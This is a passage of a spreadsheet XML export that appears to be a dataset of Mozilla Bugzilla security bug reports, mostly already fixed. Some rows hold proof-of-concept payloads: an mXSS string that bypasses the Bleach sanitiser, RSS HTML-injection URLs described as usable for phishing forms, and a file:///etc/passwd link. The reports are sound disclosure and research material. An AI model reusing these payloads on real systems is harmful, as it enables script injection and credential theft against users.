          <t>[adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q4876" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4876" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4876" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T4876" t="n">
        <v>1</v>
      </c>
      <c r="U4876" t="n">
        <v>0</v>
      </c>
      <c r="V4876" t="n">
        <v>45</v>
      </c>
      <c r="W4876" t="inlineStr">
        <is>
          <t>Created attachment 8578619
videofuzzer5.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
I wrote a little fuzzer. It should crash in a matter of seconds.</t>
        </is>
      </c>
      <c r="X4876" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4877">
      <c r="A4877" t="n">
        <v>1117977</v>
      </c>
      <c r="B4877" t="inlineStr">
        <is>
          <t>2015-01-05 13:14:46 -0800</t>
        </is>
      </c>
      <c r="C4877" t="inlineStr">
        <is>
          <t>nsScriptLoader still not thread-safe</t>
        </is>
      </c>
      <c r="D4877" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4877" t="n">
        <v>1</v>
      </c>
      <c r="F4877" t="n">
        <v>1</v>
      </c>
      <c r="G4877" t="n">
        <v>3</v>
      </c>
      <c r="H4877" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4877" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4877" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4877" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L4877" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4877" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4877" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4877" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4877" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q4877" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4877" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4877" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T4877" t="n">
        <v>1</v>
      </c>
      <c r="U4877" t="n">
        <v>0</v>
      </c>
      <c r="V4877" t="n">
        <v>25</v>
      </c>
      <c r="W4877" t="inlineStr">
        <is>
          <t>This is some kind of variant of bug 1111737.  I get this in a local debug build from today's trunk.
STR:
1. Go to http://beta.unity3d.com/jonas/DT2/
2. While the Unity engine loading bar thing is still loading, exit the browser.
result: thread safety assertion.
[68842] WARNING: '!mMainThread', file /Users/amccreight/mc/xpcom/threads/nsThreadManager.cpp, line 404
[68842] WARNING: 'NS_FAILED(rv)', file /Users/amccreight/mc/xpcom/glue/nsThreadUtils.cpp, line 174
Hit MOZ_CRASH(nsScriptLoader not thread-safe) at /Users/amccreight/mc/dom/base/nsScriptLoader.cpp:178
#01: nsRunnable::Release()[/Users/amccreight/mc/obj-dbg.noindex/dist/NightlyDebug.app/Contents/MacOS/XUL +0xfc33e]
#02: js::HelperThread::handleParseWorkload()[/Users/amccreight/mc/obj-dbg.noindex/dist/NightlyDebug.app/Contents/MacOS/XUL +0x3926523]
#03: js::HelperThread::threadLoop()[/Users/amccreight/mc/obj-dbg.noindex/dist/NightlyDebug.app/Contents/MacOS/XUL +0x3925201]
#04: _pt_root[/Users/amccreight/mc/obj-dbg.noindex/dist/NightlyDebug.app/Contents/MacOS/libnss3.dylib +0x33c199]
#05: _pthread_body[/usr/lib/system/libsystem_pthread.dylib +0x1899]
#06: _pthread_struct_init[/usr/lib/system/libsystem_pthread.dylib +0x172a]
Process 68842 stopped
* thread #16: tid = 0x61e4bb, 0x00000001024792d5 XUL`nsScriptLoader::Release(this=&lt;unavailable&gt;) + 213 at nsScriptLoader.cpp:178, name = 'Analysis Helper', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
(lldb) bt
* thread #16: tid = 0x61e4bb, 0x00000001024792d5 XUL`nsScriptLoader::Release(this=&lt;unavailable&gt;) + 213 at nsScriptLoader.cpp:178, name = 'Analysis Helper', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)
  * frame #0: 0x00000001024792d5 XUL`nsScriptLoader::Release(this=&lt;unavailable&gt;) + 213 at nsScriptLoader.cpp:178
    frame #1: 0x000000010249f1a1 XUL`(anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable() [inlined] nsRefPtr&lt;nsScriptLoader&gt;::~nsRefPtr() + 33 at nsRefPtr.h:59
    frame #2: 0x000000010249f193 XUL`(anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable() [inlined] nsRefPtr&lt;nsScriptLoader&gt;::~nsRefPtr() at nsRefPtr.h:57
    frame #3: 0x000000010249f193 XUL`(anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable() [inlined] (anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable(this=0x0000000114495d00) + 10 at nsScriptLoader.cpp:787
    frame #4: 0x000000010249f189 XUL`(anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable() [inlined] (anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable(this=0x0000000114495d00, ptr=&lt;unavailable&gt;) at nsScriptLoader.cpp:787
    frame #5: 0x000000010249f189 XUL`(anonymous namespace)::NotifyOffThreadScriptLoadCompletedRunnable::~NotifyOffThreadScriptLoadCompletedRunnable(this=0x0000000114495d00) + 9 at nsScriptLoader.cpp:787
    frame #6: 0x000000010161433e XUL`nsRunnable::Release(this=&lt;unavailable&gt;) + 94 at nsThreadUtils.cpp:32
    frame #7: 0x0000000104e3e523 XUL`js::HelperThread::handleParseWorkload(this=0x000000010bceed80) + 547 at HelperThreads.cpp:1190
    frame #8: 0x0000000104e3d201 XUL`js::HelperThread::threadLoop(this=0x000000010bceed80) + 721 at HelperThreads.cpp:1373
    frame #9: 0x000000010133c199 libnss3.dylib`_pt_root(arg=0x000000010032a370) + 281 at ptthread.c:212
    frame #10: 0x00007fff88f6d899 libsystem_pthread.dylib`_pthread_body + 138
    frame #11: 0x00007fff88f6d72a libsystem_pthread.dylib`_pthread_start + 137
    frame #12: 0x00007fff88f71fc9 libsystem_pthread.dylib`thread_start + 13</t>
        </is>
      </c>
      <c r="X4877" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4878">
      <c r="A4878" t="n">
        <v>354973</v>
      </c>
      <c r="B4878" t="inlineStr">
        <is>
          <t>2006-09-30 12:48:51 -0700</t>
        </is>
      </c>
      <c r="C4878" t="inlineStr">
        <is>
          <t>Yet Another PopupBlocker XSS</t>
        </is>
      </c>
      <c r="D4878" t="inlineStr">
        <is>
          <t>2007-02-23 13:37:34 -0800</t>
        </is>
      </c>
      <c r="E4878" t="n">
        <v>1</v>
      </c>
      <c r="F4878" t="n">
        <v>1</v>
      </c>
      <c r="G4878" t="n">
        <v>3</v>
      </c>
      <c r="H4878" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4878" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4878" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4878" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4878" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4878" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4878" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4878" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q4878" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4878" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4878" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4878" t="n">
        <v>1</v>
      </c>
      <c r="U4878" t="n">
        <v>0</v>
      </c>
      <c r="V4878" t="n">
        <v>32</v>
      </c>
      <c r="W4878" t="inlineStr">
        <is>
          <t>URI based window lookup is not safe for URIs such as data:, javascript:, etc...
http://lxr.mozilla.org/seamonkey/search?string=requestingWindowURI
steps:
1. make sure the popup blocker is enabled.
2. save the attached testcase to local disk or somewhere not B.M.O.
   this step is required to test the vulnerability correctly.
3. load the saved testcase.
4. open the blocked popup.
Several weeks ago, my HDD crashed and
I have lost some exploit testcases and mails :( ugh...</t>
        </is>
      </c>
      <c r="X4878" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4879">
      <c r="A4879" t="n">
        <v>1163422</v>
      </c>
      <c r="B4879" t="inlineStr">
        <is>
          <t>2015-05-10 12:30:39 -0700</t>
        </is>
      </c>
      <c r="C4879" t="inlineStr">
        <is>
          <t>Middle-click opens file: links from http:</t>
        </is>
      </c>
      <c r="D4879" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:00 -0700</t>
        </is>
      </c>
      <c r="E4879" t="n">
        <v>1</v>
      </c>
      <c r="F4879" t="n">
        <v>1</v>
      </c>
      <c r="G4879" t="n">
        <v>2</v>
      </c>
      <c r="H4879" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4879" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4879" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4879" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L4879" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4879" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4879" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4879" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4879" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q4879" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4879" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4879" t="inlineStr">
        <is>
          <t>Firefox 41</t>
        </is>
      </c>
      <c r="T4879" t="n">
        <v>1</v>
      </c>
      <c r="U4879" t="n">
        <v>0</v>
      </c>
      <c r="V4879" t="n">
        <v>34</v>
      </c>
      <c r="W4879" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Steps to reproduce:
1. navigate to an http site with the following HTML: &lt;a href="file:///etc/passwd"&gt;clickme&lt;/a&gt;
2. middle-click the link
dveditz says that this doesn't happen on 37.0.2.
Actual results:
file:///etc/passwd opened in a new tab
Expected results:
nothing should have happened, just like when the link gets left-clicked or "open link in new tab" is selected in the context menu</t>
        </is>
      </c>
      <c r="X4879" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4880">
      <c r="A4880" t="n">
        <v>1321247</v>
      </c>
      <c r="B4880" t="inlineStr">
        <is>
          <t>2016-11-30 02:06:03 -0800</t>
        </is>
      </c>
      <c r="C4880" t="inlineStr">
        <is>
          <t>HTML Injection into RSS reader</t>
        </is>
      </c>
      <c r="D4880" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:56 -0700</t>
        </is>
      </c>
      <c r="E4880" t="n">
        <v>1</v>
      </c>
      <c r="F4880" t="n">
        <v>1</v>
      </c>
      <c r="G4880" t="n">
        <v>6</v>
      </c>
      <c r="H4880" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4880" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J4880" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K4880" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L4880" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4880" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4880" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4880" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4880" t="inlineStr">
        <is>
          <t>[adv-main53+]</t>
        </is>
      </c>
      <c r="Q4880" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4880" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4880" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T4880" t="n">
        <v>1</v>
      </c>
      <c r="U4880" t="n">
        <v>0</v>
      </c>
      <c r="V4880" t="n">
        <v>25</v>
      </c>
      <c r="W4880" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Steps to reproduce:
Subscribe to an RSS news feed from a website in Firefox.
In certain circumstances, it is possible to inject html code by modifying the normal behavior of the RSS reader.
Original source: https://arxiv.org/help/api/index
Actual example: http://export.arxiv.org/api/query?search_query=algorithms
Example that prompts the user to Share on Facebook (you can redirect to a login impersonation page)
http://export.arxiv.org/api/query?start=1&amp;max_results=50&amp;id_token=4478b9e6-d3b5-4d71-bbb4-9979a2161122-873652752266-q5rsvcuumuk3hmstnmvkmq69oucaf7q3&amp;search_query=algorithms%3Cform%20action=%22https://arxiv.org/find/all/1/all:+cela/0/1/0/all/0/1%22%20target=%22_blank%22%20onsubmit=%22alert(1)%22%3E%3Cinput%20type=%22image%22%20align=%22right%22%20valign=%22top%22%20width=%22200%22%20margin=%220%22%20padding=%220%22%20src=%22https://www.cabq.gov/culturalservices/biopark/images/share-on-facebook.png%22%20/%3E%3C/form%3E
Example using proper html elements of the page by adding more real content (you can redirect to a phising page)
http://export.arxiv.org/api/query?start=1&amp;max_results=50&amp;id_token=4478b9e6-d3b5-4d71-bbb4-9979a2161122-873652752266-q5rsvcuumuk3hmstnmvkmq69oucaf7q3&amp;search_query=algorithms%3Cdiv%20id=%22feedHeaderContainer1%22%3E%3Cdiv%20id=%22feedHeaderContainer%22%3E%3Cform%20action=%22https://www.mozilla.com%22%20target=%22_blank%22%20onsubmit=%22alert(1)%22%3E%20%3Cdiv%20id=%22feedSubscribeLine%22%3E%3Cfont%20size=-1%3EPuedes%20cambiar%20la%20configuraci%C3%B3n%20para%20que%20la%20barra%20de%20marcadores%20aparezca%20en%20todas%20las%20p%C3%A1ginas.%3C/font%3E%3Cbutton%20align=%22right%22%3EVer%20tus%20marcadores%3C/button%3E%3Cp%3E&amp;nbsp;%3C/p%3E%3C/form%3E
Another example that could recover the user and password of an email account:
http://export.arxiv.org/api/query?start=1&amp;max_results=50&amp;id_token=4478b9e6-d3b5-4d71-bbb4-9979a2161122-873652752266-q5rsvcuumuk3hmstnmvkmq69oucaf7q3&amp;search_query=algorithms%3Cdiv%20id=%22feedHeaderContainer1%22%3E%3Cdiv%20id=%22feedHeaderContainer%22%3E%3Cform%20action=%22https://www.mozilla.com%22%20target=%22_blank%22%20onsubmit=%22alert(1)%22%3E%20%3Cdiv%20id=%22feedSubscribeLine%22%3E%3Cfont%20size=-1%3EPuedes%20cambiar%20la%20configuraci%C3%B3n%20para%20que%20la%20barra%20de%20marcadores%20aparezca%20en%20todas%20las%20p%C3%A1ginas.%3C/font%3E%3Cbutton%20align=%22right%22%3EVer%20tus%20marcadores%3C/button%3E%3Cp%3E&amp;nbsp;%3C/p%3E%3C/form%3E
(the id_token parameter is dummy and is used to hide the html code of the page)
With more imagination could get impressive results.
Actual results:
It is possible to inject html code by modifying the normal behavior of the RSS reader.
Expected results:
The rss manager should escape the characters sent as url parameters</t>
        </is>
      </c>
      <c r="X4880" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4881">
      <c r="A4881" t="n">
        <v>1689399</v>
      </c>
      <c r="B4881" t="inlineStr">
        <is>
          <t>2021-01-28 08:25:34 -0800</t>
        </is>
      </c>
      <c r="C4881" t="inlineStr">
        <is>
          <t>mXSS in Mozilla-bleach with p tag</t>
        </is>
      </c>
      <c r="D4881" t="inlineStr">
        <is>
          <t>2024-05-30 10:26:41 -0700</t>
        </is>
      </c>
      <c r="E4881" t="n">
        <v>1</v>
      </c>
      <c r="F4881" t="n">
        <v>1</v>
      </c>
      <c r="G4881" t="n">
        <v>4</v>
      </c>
      <c r="H4881" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4881" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J4881" t="inlineStr">
        <is>
          <t>Bleach-security</t>
        </is>
      </c>
      <c r="K4881" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4881" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4881" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4881" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4881" t="inlineStr"/>
      <c r="Q4881" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4881" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4881" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4881" t="n">
        <v>1</v>
      </c>
      <c r="U4881" t="n">
        <v>0</v>
      </c>
      <c r="V4881" t="n">
        <v>14</v>
      </c>
      <c r="W4881" t="inlineStr">
        <is>
          <t>Copying a report from Yaniv Nizry (CC'd) to security@:
Hello,
My name is Yaniv Nizry and I’m a security analyst at Checkmarx's CxSCA group.
Checkmarx is a global software security company aiming for the safer usage of code and libraries.
I recently found another mXSS vulnerability in Mozilla-bleach.
**Steps to reproduce:**
1. Have strip_comments set to False and allow `math/svg`, `p`, and `style` tag.
1. Clean the following: `&lt;math&gt;&lt;/p&gt;&lt;style&gt;&lt;!--&lt;/style&gt;&lt;img src/onerror=alert(1)&gt;
1. Bleach output: `&lt;math&gt;&lt;p&gt;&lt;/p&gt;&lt;style&gt;&lt;!--&lt;/style&gt;&lt;img src/onerror=alert(1)&gt;--&gt;&lt;/style&gt;&lt;/math&gt;`
```python
&gt;&gt;&gt; import bleach
&gt;&gt;&gt; bleach.__version__
'3.2.3'
&gt;&gt;&gt; bleach.clean('&lt;math&gt;&lt;/p&gt;&lt;style&gt;&lt;!--&lt;/style&gt;&lt;img src/onerror=alert(1)&gt;', tags=['math', 'p', 'style'], strip_comments=False)
'&lt;math&gt;&lt;p&gt;&lt;/p&gt;&lt;style&gt;&lt;!--&lt;/style&gt;&lt;img src/onerror=alert(1)&gt;--&gt;&lt;/style&gt;&lt;/math&gt;'
```
4. After parsing it again in the browser:
```html
&lt;html&gt;
  &lt;head&gt;&lt;/head&gt;
  &lt;body&gt;
    &lt;math&gt;&lt;/math&gt;
    &lt;p&gt;&lt;/p&gt;
    &lt;style&gt;&lt;!--&lt;/style&gt;
    &lt;img src(unknown) onerror="alert(1)"&gt;
    "--&gt;
    "
  &lt;/body&gt;
&lt;/html&gt;
```
**Expected results:**
Alert 1 will pop on the browser.
**Details:**
In HTML the ‘p’ tag (and also ‘br’) are the only tags that will be created with just an end tag (e.g. &lt;/p&gt; == &lt;p&gt;&lt;/p&gt; on the other hand &lt;/a&gt; == nothing).
Also, in the math/svg namespace there are tags that stop the namespace and breaks out of the namespace, e.g. (using img as a breaker):
`&lt;svg&gt;&lt;img&gt;&lt;/svg&gt; == &lt;svg&gt;&lt;img&gt;&lt;/svg&gt;`
`&lt;svg&gt;&lt;style&gt;&lt;/svg&gt; == &lt;svg&gt;&lt;style&gt;&lt;/style&gt;&lt;/svg&gt; ==` style is not a breaker
`&lt;svg&gt;&lt;img&gt;&lt;style&gt;&lt;/style&gt;&lt;/svg&gt; == &lt;svg&gt;&lt;/svg&gt;&lt;img&gt;&lt;style&gt;&lt;/style&gt; ==` the breaker ejects elements that come after.
The parsing issue here is when passing p as an end tag it doesn’t count as a namespace breaker, see how parsing twice will change the output:
```python
&gt;&gt;&gt; bleach.clean("&lt;math&gt;&lt;p&gt;", tags=["math", "p"])
'&lt;math&gt;&lt;p&gt;&lt;/p&gt;&lt;/math&gt;'
&gt;&gt;&gt; bleach.clean("&lt;math&gt;&lt;p&gt;&lt;/p&gt;&lt;/math&gt;", tags=["math", "p"])
'&lt;math&gt;&lt;/math&gt;&lt;p&gt;&lt;/p&gt;'
```
So going back to our PoC, at first the style tag is in svg/math namespace so the comment is like an html comment, then when parsing again on the browser the p tag breaks the style out of the svg/math namespace changing it to and html namespace style.
Now there is no comment and there is an img tag.
Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031
Feel free to contact us for any questions.
Best regards,
Yaniv</t>
        </is>
      </c>
      <c r="X4881" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4882">
      <c r="A4882" t="n">
        <v>1230768</v>
      </c>
      <c r="B4882" t="inlineStr">
        <is>
          <t>2015-12-05 10:25:38 -0800</t>
        </is>
      </c>
      <c r="C4882" t="inlineStr">
        <is>
          <t>Potential race conditions around block-level statics cause memory-safety bugs</t>
        </is>
      </c>
      <c r="D4882" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:48 -0700</t>
        </is>
      </c>
      <c r="E4882" t="n">
        <v>1</v>
      </c>
      <c r="F4882" t="n">
        <v>1</v>
      </c>
      <c r="G4882" t="n">
        <v>3</v>
      </c>
      <c r="H4882" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4882" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4882" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K4882" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L4882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4882" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4882" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4882" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4882" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4882" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4882" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T4882" t="n">
        <v>1</v>
      </c>
      <c r="U4882" t="n">
        <v>0</v>
      </c>
      <c r="V4882" t="n">
        <v>50</v>
      </c>
      <c r="W4882" t="inlineStr">
        <is>
          <t>The codebase contains many instances of code like this:
   static CC* CC::GetInstance () {
      static CC theInstance;
      return &amp;theInstance;
   }
This pattern is not thread-safe under compilers lacking C++11 compliance, in particular compliance with s.6.7(4). Concurrent execution of such code could cause use of incompletely-initialized, partially-deleted, or otherwise broken objects, depending upon how CC is implemented and the exact timing of the racing threads. Since (at least) VS &lt; VS 2015 is non-compliant, this issue potentially affects the Mozilla codebase.
The discussion at https://bugzilla.mozilla.org/show_bug.cgi?id=1218124#c11 and following comments describes the problem in detail. Also, you easily can see the problem by examining the code that, e.g., VS 2012 generates for:
   static CC* CC::GetInstance () {
      static CC theInstance;
      return &amp;theInstance;
   }
which is similar to:
   /* module-level hidden variable */ static bool is_CC_theInstance_initialized;
   if (!is_CC_theInstance_initialized) {
      is_CC_theInstance_initialized = true;
      ::new (&amp;theInstance) CC;
   }
   return &amp;theInstance;</t>
        </is>
      </c>
      <c r="X4882" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4883">
      <c r="A4883" t="n">
        <v>1252037</v>
      </c>
      <c r="B4883" t="inlineStr">
        <is>
          <t>2016-02-29 03:43:57 -0800</t>
        </is>
      </c>
      <c r="C4883" t="inlineStr">
        <is>
          <t>TEST-UNEXPECTED-ERROR | test_safe_browsing_notification.py TestSafeBrowsingNotificationBar.test_notification_bar | MarionetteException: MarionetteException: Property not found: safebrowsing.notAForgeryButton.label</t>
        </is>
      </c>
      <c r="D4883" t="inlineStr">
        <is>
          <t>2016-03-06 17:03:12 -0800</t>
        </is>
      </c>
      <c r="E4883" t="n">
        <v>1</v>
      </c>
      <c r="F4883" t="n">
        <v>1</v>
      </c>
      <c r="G4883" t="n">
        <v>3</v>
      </c>
      <c r="H4883" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4883" t="inlineStr">
        <is>
          <t>Testing</t>
        </is>
      </c>
      <c r="J4883" t="inlineStr">
        <is>
          <t>Firefox UI Tests</t>
        </is>
      </c>
      <c r="K4883" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L4883" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4883" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4883" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4883" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4883" t="inlineStr"/>
      <c r="Q4883" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4883" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4883" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T4883" t="n">
        <v>1</v>
      </c>
      <c r="U4883" t="n">
        <v>0</v>
      </c>
      <c r="V4883" t="n">
        <v>10</v>
      </c>
      <c r="W4883" t="inlineStr">
        <is>
          <t>Since our Fx UI Tests are getting executed via TaskCluster we have this new kind of test failure. I have not seen it on Try! It started with the landing on inbound.
https://treeherder.mozilla.org/#/jobs?repo=mozilla-inbound&amp;filter-searchStr=Firefox%20UI&amp;filter-tier=2&amp;filter-tier=3&amp;selectedJob=22620661
 11:23:57     INFO - TEST-UNEXPECTED-ERROR | test_safe_browsing_notification.py TestSafeBrowsingNotificationBar.test_notification_bar | MarionetteException: MarionetteException: Property not found: safebrowsing.notAForgeryButton.label
 11:23:57     INFO - Traceback (most recent call last):
 11:23:57     INFO -   File "/home/worker/workspace/build/venv/local/lib/python2.7/site-packages/marionette/marionette_test.py", line 344, in run
 11:23:57     INFO -     testMethod()
 11:23:57     INFO -   File "/home/worker/workspace/build/venv/local/lib/python2.7/site-packages/firefox_ui_tests/functional/security/test_safe_browsing_notification.py", line 73, in test_notification_bar
 11:23:57     INFO -     self.check_not_badware_button(button_property, report_page)
 11:23:57     INFO -   File "/home/worker/workspace/build/venv/local/lib/python2.7/site-packages/firefox_ui_tests/functional/security/test_safe_browsing_notification.py", line 106, in check_not_badware_button
 11:23:57     INFO -     label = self.browser.get_property(button_property)
 11:23:57     INFO -   File "/home/worker/workspace/build/venv/local/lib/python2.7/site-packages/firefox_puppeteer/ui/windows.py", line 323, in get_property
 11:23:57     INFO -     return self._l10n.get_property(self.properties, property_id)
 11:23:57     INFO -   File "/home/worker/workspace/build/venv/local/lib/python2.7/site-packages/firefox_puppeteer/api/l10n.py", line 90, in get_property
11:23:57 INFO - raise MarionetteException('Property not found: %s' % property_id) 
Not sure yet what's special or different in those taskcluster tasks, but this is suspicious given the permanent failure.</t>
        </is>
      </c>
      <c r="X4883" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4884">
      <c r="A4884" t="n">
        <v>313373</v>
      </c>
      <c r="B4884" t="inlineStr">
        <is>
          <t>2005-10-22 05:14:03 -0700</t>
        </is>
      </c>
      <c r="C4884" t="inlineStr">
        <is>
          <t>window.controllers allows some evil things</t>
        </is>
      </c>
      <c r="D4884" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4884" t="n">
        <v>1</v>
      </c>
      <c r="F4884" t="n">
        <v>1</v>
      </c>
      <c r="G4884" t="n">
        <v>3</v>
      </c>
      <c r="H4884" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4884" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4884" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4884" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4884" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4884" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4884" t="inlineStr">
        <is>
          <t>RESOLVED</t>
